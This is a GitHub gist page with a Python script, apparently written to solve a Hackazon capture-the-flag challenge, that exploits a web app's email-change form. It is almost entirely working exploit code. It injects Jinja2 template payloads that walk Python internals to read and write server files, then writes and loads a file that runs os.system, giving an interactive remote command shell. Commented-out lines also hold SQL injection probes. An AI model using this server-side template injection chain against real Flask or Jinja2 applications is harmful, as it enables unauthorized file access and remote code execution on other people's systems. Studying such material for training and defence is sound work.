Skip to content

Instantly share code, notes, and snippets.

@eyJhb
Last active October 16, 2018 10:45
Show Gist options
  • Save eyJhb/801361e6165c428dd6311a5577a09a0a to your computer and use it in GitHub Desktop.
Save eyJhb/801361e6165c428dd6311a5577a09a0a to your computer and use it in GitHub Desktop.
Cyberhack script for LaaS
import html
import requests
from bs4 import BeautifulSoup
import random
import base64
class lass(object):
def __init__(self):
self.s = requests.session()
def url(self, path):
return "https://portal.hackazon.org/challenge/0532914ef2f52f529a30a27947651f30" + path
def getToken(self, url):
req = self.s.get(url)
bs = BeautifulSoup(req.text, "html.parser")
token = bs.find("input", {"id": "csrf_token"})["value"]
return token
def readfile(self, filename):
self.changeMail("''.__class__.__mro__[2].__subclasses__()[40]('"+filename+"').read()")
def writefile(self, filename, content):
self.changeMail("''.__class__.__mro__[2].__subclasses__()[40]('"+filename+"', 'w').write('"+content+"')")
def execute(self, cmd):
filenamePy = "/tmp/pwnasd.py"
filenameTxt = "/tmp/pwnasd"
self.writefile(filenamePy, "import os; os.system(\""+cmd+" > "+filenameTxt+"\")")
self.readResult()
self.readfile(filenamePy)
self.readResult()
self.changeMail("config.from_pyfile('"+filenamePy+"')")
self.readfile(filenameTxt)
self.readResult()
def trySignup(self):
n = 'http://10.10.0.1:38194/challenge/c8eaa319591b511c5b58c26c4dbb36e5/private'
data = {
"username": str(random.randint(0,99999))+"username",
"email": str(random.randint(0,99999))+"secret@email.com",
"password": "MyPassword1",
"csrf_token": "",
"next": n,
"reg_next": n,
"invite_token": "123456"*200,
}
url = self.url("/user/register")
token = self.getToken(url)
data["csrf_token"] = token
req = self.s.post(url, data=data)
if not "You have signed in successfully" in req.text:
print("Failed to signup")
exit(1)
def changeMail(self, payload):
print(payload)
data = {
"csrf_token": "",
"next": "",
"old_password": "MyPassword1",
"new_email": "{{ " + payload + " }}@mail" + str(random.randint(0,9999)) + ".dk"
}
url = self.url("/user/change-email")
token = self.getToken(url)
data["csrf_token"] = token
req = self.s.post(url, data=data)
if not "has been changed successfully" in req.text:
print("Failed to inject payload")
exit(1)
def readResult(self):
req = self.s.get(self.url("/private"))
print(req.text)
res = req.text.split("@mail")[0]
res = res.split("your address (")[1]
print(html.unescape(res))
def changePassword(self):
data = {
"csrf_token": "",
#"next": "\" sdf sdf dsfsdijf SLEEP(10)--",
"old_password": "MyPassword1",
"new_password": "{{ PWD }}"
}
url = self.url("/user/change-password")
token = self.getToken(url)
#token = "##".join([token.split("##")[0] + "' AND 1=1", token.split("##")[1]])
data["csrf_token"] = token
print(token)
req = self.s.post(url, data=data)
print("Changing pwd: ", req.status_code)
print("has been changed successfully" in req.text)
res = req.text
res = "".join([res.split('div id="main-div"')[1]])
res = "".join([res.split("Welcome")[0]])
res = "\n".join(res.split("\n\r\n"))
print(res)
import sys
x = lass()
x.trySignup()
while True:
cmd = input("SHELL$ ")
x.execute(cmd)
# x.writefile("/tmp/test", "test")
# x.readResult()
# x.readfile("/tmp/test")
# x.readResult()
# x.changeMail(sys.argv[1])
# x.readResult()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment